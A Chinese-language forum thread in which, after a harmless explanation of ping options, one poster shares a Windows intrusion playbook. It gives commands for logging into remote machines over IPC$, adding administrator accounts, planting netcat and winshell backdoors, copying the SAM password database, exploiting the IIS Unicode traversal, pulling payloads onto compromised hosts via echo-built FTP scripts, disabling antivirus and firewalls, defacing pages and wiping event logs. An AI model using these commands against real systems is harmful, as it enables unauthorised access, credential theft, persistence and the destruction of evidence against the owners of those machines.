从上面这个结果中我们除了获得ip地址,还可以获得ttl(time to life,生命周期),ttl是每经过一个路由器就会被减一的一个值,通过ttl的值我们可以简单地判断对方的操作系统和经过的路由器的个数。
默认情况下ttl=128为windows,而ttl=255为unix
接下来看一下ping的几个参数(这里针对几个比较有用的讲一讲):
options:
-t 加上该参数,就是不断地ping对方,直到按ctrl+c结束
-a 这个参数是解析主机名到ip地址,如下例:
c:\>ping -a 192.168.0.2 -n 1
pinging python [192.168.0.2] with 32 bytes of data:
reply from 192.168.0.2: bytes=32 time<10ms ttl=255
ping statistics for 192.168.0.2:
packets: sent = 1, received = 1, lost = 0 (0% loss),
approximate round trip times in milli-seconds:
minimum = 0ms, maximum = 0ms, average = 0ms
注意看这一行“pinging python [192.168.0.2] with 32 bytes of data:”得到主机名python
注意:这个参数只有在局域网内才起作用的
-n count 这个参数可以定制数据echo请求数据包的发送个数,例如上面,我使用-n 1
-l size 该参数定制发送数据包的大小,windows中最大为65500,命令格式:ping ip -l 65500
默认发送的数据包大小为32bytes
-f 在网络上传输数据的时候,当数据包的大小超过网络的允许大小的时候,就要进行分段, 然而,该参数的作用就是不允许发送的数据包分段。建议不要使用这个,因为,如果不了 解网络对数据包大小的要求的话,设置该位可能会导致数据无法传输,下面两个结果大家 可以比较一下:
1:
c:\>ping 192.168.0.1 -l 64 -n 1 -f
pinging 192.168.0.1 with 64 bytes of data:
reply from 192.168.0.1: bytes=64 time<10ms ttl=128
ping statistics for 192.168.0.1:
packets: sent = 1, received = 1, lost = 0 (0% loss),
approximate round trip times in milli-seconds:
minimum = 0ms, maximum = 0ms, average = 0ms
2:
c:\>ping 192.168.0.1 -l 1500 -n 1 -f
pinging 192.168.0.1 with 1500 bytes of data:
packet needs to be fragmented but df set.(这句话的意思就是,网络要求分段,而该数据中的分段位又被 设置为不允许分段,这就导致数据无法传送)
ping statistics for 192.168.0.1:
packets: sent = 1, received = 0, lost = 1 (100% loss),
approximate round trip times in milli-seconds:
minimum = 0ms, maximum = 0ms, average = 0ms
大家有兴趣可以试试,这样多试几次可以试出在你的网络中数据包每段大概被分为多大(不过很辛苦哦)。
-i ttl 这是用来设置生命周期(ttl)的,没什么好说的吧,如果不懂的再问吧
-v tos 设置tos(服务类型)的,对此不多阐述,因为关于tos虽然见的不多,但是,其实是有很 多东西值得讲的,如果多说就说不完了,而且也不好叙述,所以大家看一下相关书籍了解 一下,关于这方面有不懂的再提问吧。
-r count 这个参数很有意思,有点类似tracert了,作用就是记录经过的路由器,拿个例子来:
c:\>ping 192.168.0.1 -r 1 -n 1
pinging 192.168.0.1 with 32 bytes of data:
reply from 192.168.0.1: bytes=32 time<10ms ttl=128
route: 192.168.0.1
ping statistics for 192.168.0.1:
packets: sent = 1, received = 1, lost = 0 (0% loss),
approximate round trip times in milli-seconds:
minimum = 0ms, maximum = 0ms, average = 0ms
注意这一行“route: 192.168.0.1”这就是经过的路由器,因为我这里只有两台计算机,没有路由器,所以记录下来的就是默认路由了(也就是被ping主机本身)。大家可以这样做:ping [You must be registered and logged in to see this link.] -r 9
会记录经过的9部路由器的地址哦 ……
注意:-r参数后面的值最小为1,最大为9,也就是说,最多只能记录9台(这就不如tracert命令了)。
-w timeout 这个就是用来设置超时的。
c:\>ping 192.168.0.1 -w 1 -n 1
pinging 192.168.0.1 with 32 bytes of data:
reply from 192.168.0.1: bytes=32 time<10ms ttl=128
ping statistics for 192.168.0.1:
packets: sent = 1, received = 1, lost = 0 (0% loss),
approximate round trip times in milli-seconds:
minimum = 0ms, maximum = 0ms, average = 0ms
这个没有什么好说的吧,如果感觉线路不怎么样,传输速度比较慢,那么,把这个值设置得大一些。
注意:该值后面的timeout的单位是毫秒(ms)—— 整理 来自网络

cyjian
Spammer
Spammer

Posts : 211
Points : 25655
Reputation : 0
Join date : 2014-06-18

View user profile

Back to top Go down

Re: CMD,ping,DOS命令集

Post by cyjian on December 12th 2014, 10:31

菜鸟必练命令


1:NET
只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!
这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1
net use \\127.0.0.1\ipc$ "123456" /user:"hbx"
退出的命令是
net use \\127.0.0.1\ipc$ /delte
下面的操作你必须登陆后才可以用.登陆的方法就在上面.
----------------------
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.
我们加一个heibai的用户密码为lovechina
net user heibai lovechina /add
只要显示命令成功,那么我们可以把他加入Administrator组了.
net localgroup Administrators heibai /add
----------------------
这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.
net use z:\\127.0.0.1\c$
----------------------
net start telnet
这样可以打开对方的TELNET服务.
----------------------
这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。

 
net user guest /active:yes
----------------------
这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀!
net user guest lovechina
net命令果然强大啊!
2:at
一般一个**者**后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?
那么需要用AT命令,这里假设你已经登陆了那个服务器。
你首先要得到对方的时间,
net time \\127.0.0.1
将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1
at \\127.0.0.1 12:3 nc.exe
这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上.
这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99.
等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.
3:telnet
这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.
telnet 127.0.0.1 99
这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.
4:FTP
它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个[You must be registered and logged in to see this link.],不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器.
在上传前需要登陆先,这里我们假设FTP服务器是[You must be registered and logged in to see this link.],用户名是HUCJS,密码是654321
ftp [You must be registered and logged in to see this link.]
他会要求输入用户,成功后会要求输入密码.
下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\
get c:\index.htm d:\
假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下
put c:\index.htm d:\
5:copy
下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。
这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下
copy index.htm \\127.0.0.1\c$\index.htm
----------------------
如果你要复制到D盘下把C改为D,就行了!

copy index.htm \\127.0.0.1\d$\index.htm
----------------------
如果你要把他复制到WINNT目录里
就要把输入
copy index.htm \\127.0.0.1\admin$\index.htm
admin$是winnt
----------------------
要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名
下面就把127.0.0.1的数据库复制到本地C盘下
copy \\127.0.0.1\admin$\repair\sam._ c:\
----------------------
6:set
如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令!
下面是我得到的结果!我来分析它,只是找主页在那而已。
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
script_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定 会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就 是主页的名称了。

 
7:nbtstat
如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧!
现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。
命令是
nbtstat -A XX.XX.XX.XX
-A一定要大写哦。
下面是得到的结果。
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP

粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是<03>的话,那他前面的就是用户。
这里的用户是PENTIUMII。
8:Shutdown
关了对方的NT服务器的命令
Shutdown \\IP地址 t:20
20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的**者呀。
9:DIR
这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。
你可以本地试下。
10:echo
著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。
我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写入index.htm,有2种方法,大家看看有什么区别。
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.htm
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.htm
第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖!”写进index.htm。
第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到index.htm里面。
“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。
大家可以本地试下。
可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。
1、首先,我们需要申请一个免费的主页空间。
2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。)
open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
get index.htm c:\inetpub\wwwroot\index.htm(这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm)
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)
具体的做法:
输入 echo open upload.chinaren.com> c:\cnhack.txt
输入 echo cnhack >> c:\cnhack.txt
输入 echo 39abs >> c:\cnhack.txt
输入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最后输入 ftp -s:c:\cnhack.txt (利用ftp的-s参数,执行文件里的内容。)
等命令完成时,文件已经下载到你指定的文件里了。
注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。)
记得要 del c:\cnhack.txt
11:attrib
这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。
attrib -r index.htm
这个命令是把index.htm的只读属性去掉。
如果把“-”改为“+”则是把这个文件的属性设置为只读
----------------------
attrib +r index.htm
这个命令是把index.htm的属性设置为只读。
12:del
当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗。呵呵。
NT的日志有这些
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改成其他盘。

cyjian
Spammer
Spammer

Posts : 211
Points : 25655
Reputation : 0
Join date : 2014-06-18

View user profile

Back to top Go down

Re: CMD,ping,DOS命令集

Post by cyjian on December 12th 2014, 10:31

超级代码指令大全


net user heibai lovechina /add                       加一个heibai的用
户密码为lovechina
net localgroup Administrators heibai /add         
把他加入
Administrator

net start telnet                                    
开对方的TELNET

net use z:\127.0.0.1c$                                
映射对方的C
net user guest /active:yes                              
Guest用户激

net user guest lovechina                              
guest的密码改
lovechina
net user                                               
查看所有用户列

net user
用户名 /delete                                   删掉
net time \\127.0.0.1                                   
得到对方的时间

get c:\index.htm d:\                                 
上传的文件是
INDEX.HTM
,它位于C:\下,传到对方D:\
copy index.htm \\127.0.0.1\c$\index.htm                 
本地C盘下的
index.htm
复制到127.0.0.1C
NET VIEW                                               
显示域列表、计
算机列表或指定计算机的共
计算机运行命令全集 winver---------检查Windows版本
wmimgmt.msc----
打开windows管理体系结构
wupdmgr--------windows
更新程序
winver---------
检查Windows版本
wmimgmt.msc----
打开windows管理体系结构
wupdmgr--------windows
更新程序
wscript--------windows
脚本宿主设置
write----------
写字板winmsd-----系统信息
wiaacmgr-------
扫描仪和照相机向导
winchat--------XP
自带局域网聊天
mem.exe--------
显示内存使用情况
Msconfig.exe---
系统配置实用程序
mplayer2-------
简易widnows media player
mspaint--------
画图板
mstsc----------
远程桌面连接
net use \\ip\ipc$ " " /user:" "
建立IPC空链接
net use \\ip\ipc$ "
密码" /user:"用户名" 建立IPC非空链接
net use h: \\ip\c$ "
密码" /user:"用户名" 直接登陆后映射对方C:到本地
H:
net use h: \\ip\c$
登陆后映射对方C:到本地为H:
net use \\ip\ipc$ /del
删除IPC链接
net use h: /del
删除映射对方到本地的为H:的映射
net user
用户名 密码 /add 建立用户
net user guest /active:yes
激活guest用户
net user
查看有哪些用户
net user
帐户名 查看帐户的属性
net localgroup administrators
用户名 /add 用户添加到管理员中使
其具有管理员权限,注意:administrator后加s用复数
net start
查看开启了哪些服务
net start
服务名  开启服务;(:net start telnet net start
schedule)
net stop
服务名 停止某服务
net time \\目标ip
查看对方时间
net time \\目标ip /set
设置本地计算机时间与目标IP”主机的时间同步,
加上参数/yes可取消确认信息
net view
查看本地局域网内开启了哪些共享
net view \\ip
查看对方局域网内开启了哪些共享
net config
显示系统网络设置
net logoff
断开连接的共享
net pause
服务名 暂停某服务
net send ip "
文本信息" 向对方发信息
net ver
局域网内正在使用的网络连接类型和信息
net share
查看本地开启的共享
net share ipc$
开启ipc$共享
net share ipc$ /del
删除ipc$共享
net share c$ /del
删除C:共享
net user guest 12345
guest用户登陆后用将密码改为12345
net password
密码 更改系统登陆密码
netstat -a
查看开启了哪些端口,常用netstat -an
netstat -n
查看端口的网络连接情况,常用netstat -an
netstat -v
查看正在进行的工作
netstat -p
协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看
tcp/ip
协议使用情况)
netstat -s
查看正在使用的所有协议使用情况
nbtstat -A ip
对方136139其中一个端口开了的话,就可查看对方最近登陆
的用户名(03前的为用户名)-注意:参数-A要大写
tracert -
参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字用于
设置超时间隔。
ping ip(
或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格
]
数据包大小“-n发送数据次数“-t”指一直ping
ping -t -l 65550 ip
死亡之ping(发送大于64K的文件并一直ping就成了死亡
ping)
ipconfig (winipcfg)
用于windows NTXP(windows 95 98)查看本地ip地址,
ipconfig
可用参数“/all”显示全部配置信息
tlist -t
以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安
装目录的Support/tools文件夹内)
kill -F
进程名 -F参数后强制结束某进程(为系统的附加工具,默认是没有
安装的,在安装目录的Support/tools文件夹内)
del -F
文件名 -F参数后就可删除只读文件,/AR/AH/AS/AA分别表示删
除只读、隐藏、系统、存档文件,/A-R/A-H/A-S/A-A表示删除除只读、
隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有
只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

mplayer2-------
媒体播放机
magnify--------
放大镜实用程序
mmc------------
打开控制台
mobsync--------
同步命令
dxdiag---------
检查DirectX信息
drwtsn32------
系统医生
devmgmt.msc---
设备管理器
dfrg.msc-------
磁盘碎片整理程序
diskmgmt.msc---
磁盘管理实用程序
dcomcnfg-------
打开系统组件服务
ddeshare-------
打开DDE共享设置
dvdplay--------DVD
播放器
net stop messenger-----
停止信使服务
net start messenger----
开始信使服务
notepad--------
打开记事本
nslookup-------
网络管理的工具向导
ntbackup-------
系统备份和还原
narrator-------
屏幕"讲述人"
ntmsmgr.msc----
移动存储管理器
ntmsoprq.msc---
移动存储管理员操作请求
netstat -an----(TC)
命令检查接口
syncapp--------
创建一个公文包
sysedit--------
系统配置编辑器
sigverif-------
文件签名验证程序
sndrec32-------
录音机
shrpubw--------
创建共享文件夹
secpol.msc-----
本地安全策略
syskey---------
系统加密,一旦加密就不能解开,保护windows xp系统的双重
密码
services.msc---
本地服务设置
Sndvol32-------
音量控制程序
sfc.exe--------
系统文件检查器
sfc /scannow---windows
文件保护
Nslookup-------60
秒倒计时关机命令
tourstart------xp
简介(安装完成后出现的漫游xp程序)
taskmgr--------
任务管理器
eventvwr-------
事件查看器
eudcedit-------
造字程序
explorer-------
打开资源管理器
packager-------
对象包装程序
perfmon.msc----
计算机性能监测程序
progman--------
程序管理器
regedit.exe----
注册表
rsop.msc-------
组策略结果集
regedt32-------
注册表编辑器
rononce -p ----15
秒关机
regsvr32 /u *.dll----
停止dll文件运行
regsvr32 /u zipfldr.dll------
取消ZIP支持
cmd.exe--------CMD
命令提示符
chkdsk.exe-----Chkdsk
磁盘检查
certmgr.msc----
证书管理实用程序
calc-----------
启动计算器
charmap--------
启动字符映射表
cliconfg-------SQL SERVER
客户端网络实用程序
Clipbrd--------
剪贴板查看器
conf-----------
启动netmeeting
compmgmt.msc---
计算机管理
cleanmgr-------**
整理
ciadv.msc------
索引服务程序
osk------------
打开屏幕键盘
odbcad32-------ODBC
数据源管理器
oobe/msoobe /a----
检查XP是否激活
lusrmgr.msc----
本机用户和组
logoff---------
注销命令
iexpress-------
木马捆绑工具,系统自带
Nslookup-------IP
地址侦测器
fsmgmt.msc-----
共享文件夹管理器
utilman--------
辅助工具管理器
gpedit.msc-----
组策略
tsshutdn
关机

net share $c=c:\
共享C

cyjian
Spammer
Spammer

Posts : 211
Points : 25655
Reputation : 0
Join date : 2014-06-18

View user profile

Back to top Go down

Re: CMD,ping,DOS命令集

Post by cyjian on December 12th 2014, 10:31

典型DOS攻击命令


.对用户操作

net user
查看有哪些用户

net user guest /active:yes
激活guest用户

net user
用户名 密码 /add 建立用户

net localgroup administrators
用户名 /add 用户添加到管理员中

使其具有管理员权限


net start -----
查看开启了哪些服务

net start
服务名-----开启服务

net stop
服务名------停止某服务

netstat -an  :
查看端口的网络连接情况

ipconfig :
查看本地ip地址

net stop sharedaccess  ----
关系统自带防火墙

pskill.exe ravmon -----
杀掉瑞星软件

pskill.exe pfw  ----
关天网防火墙

net stop "Symantec AntiVirus"----
关于诺顿企业版

net stop KAVStart------
关闭金山杀毒


向肉鸡上传文件命令:

第一种方法:tftp

命令格式:tftp -i 你的公网IP  get xx.exe

第二种方法:ftp

命令格式:

echo open xxx.xxx.xxx.xxx>c:\520hack.txt

echo user>>c:\520hack.txt

echo pass>>c:\520hack.txt  

echo get aoqi.rar>>c:\520hack.txt

echo bye>>c:\520hack.txt

ftp -s:c:\520hack.txt

del c:\520hack.txt

cyjian
Spammer
Spammer

Posts : 211
Points : 25655
Reputation : 0
Join date : 2014-06-18

View user profile

Back to top Go down

Re: CMD,ping,DOS命令集

Post by cyjian on December 12th 2014, 10:32

网管和黑客都必须知道的命令


网管和黑客都必须知道的命令!看了不要做坏事!

(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""

(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"

(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$

(查看远程主机时间) net time \\IP地址

(定时启动某个程序) at \\IP地址 02:18 readme.exe

(查看共享) net view \\IP地址

(查看netbios工作组列表) nbtstat -A IP地址

(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"

(这两条把自己增加到管理员组): net user 用户名 密码 /add

net localgroup Administrators 用户名 /add

(断开连接) net use \\IP地址\ipc$ /delete

=====================================================

擦屁屁:

del C:\winnt\system32\logfiles\*.*

del C:\winnt\system32\config\*.evt

del C:\winnt\system32\dtclog\*.*

del C:\winnt\system32\*.log

del C:\winnt\system32\*.txt

del C:\winnt\*.txt

del C:\winnt\*.log

============================

一、netsvc.exe

下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:

netsvc /list \\IP地址

netsvc schedule \\IP地址 /query

netsvc \\IP地址 schedule /start

二、OpenTelnet.exe

远程启动主机的Telnet服务,并绑定端口到7878,例如:

OpenTelnet \\IP地址 用户名 密码 1 7878

然后就可以telnet到主机的7878端口,进入DOS方式下:

telnet IP地址 7878

三、winshell.exe

一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:

p Path (查看winshell主程序的路径信息)

b reBoot (重新启动机器)

d shutDown (关闭机器)

s Shell (执行后你就会看到可爱的“C:\>”)

x eXit (退出本次登录会话,此命令并不终止winshell的运行)

CMD> [You must be registered and logged in to see this link.] (通过http下载其他网站上的文件到运行winshell的机器上)

四、3389登陆器,GUI方式登录远程主机的

五、elsave.exe

事件日志清除工具

elsave -s \\IP地址 -l "application" -C

elsave -s \\IP地址 -l "system" -C

elsave -s \\IP地址 -l "security" -C

执行后成功清除应用程序日志,系统日志,安全日志

六、hbulot.exe

开启win2kserver和winxp的3389服务

hbulot [/r]

使用/r表示安装完成后自动重起目标使设置生效。

七、nc.exe(netcat.exe)

一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。

想要连接到某处: nc [-options] hostname port [ports] ...

绑定端口等待连接: nc -l -p port [-options] [hostname] [port]

参数:

-e prog
程序重定向,一旦连接,就执行 [危险!!]

-g gateway source-routing hop point, up to 8

-G num source-routing pointer: 4, 8, 12, ...

-h
帮助信息

-i secs
延时的间隔

-l
监听模式,用于入站连接

-n
指定数字的IP地址,不能用hostname

-o file
记录16进制的传输

-p port
本地端口号

-r
任意指定本地及远程端口

-s addr
本地源地址

-u UDP
模式

-v
详细输出——用两个-v可得到更详细的内容

-w secs timeout
的时间

-z
将输入输出关掉——用于扫描时

八、TFTPD32.EXE

把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:

[You must be registered and logged in to see this link.] cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i
本机IP地址 get 文件名 c:\winnt\system32\文件名

然后可以直接令文件运行:

[You must be registered and logged in to see this link.] cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+
文件名

九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用 telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp 下需要打winxp

一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。

一、一 Xscan命令行运行参数说明:

在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。

1.
命令格式: xscan -host [-] [其他选项]

xscan -file [
其他选项]

其中 含义如下:

-port :
检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表)

-ftp :
检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件)

-ntpass :
检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件)

-cgi :
检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案)

-iis :
检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案)

[
其他选项] 含义如下:

-v:
显示详细扫描进度

-p:
跳过Ping不通的主机

-o:
跳过没有检测到开放端口的主机

-t :
指定最大并发线程数量和并发主机数量, 默认数量为100,10

cyjian
Spammer
Spammer

Posts : 211
Points : 25655
Reputation : 0
Join date : 2014-06-18

View user profile

Back to top Go down

Re: CMD,ping,DOS命令集

Post by Sponsored content


Sponsored content


Back to top Go down

View previous topic View next topic Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum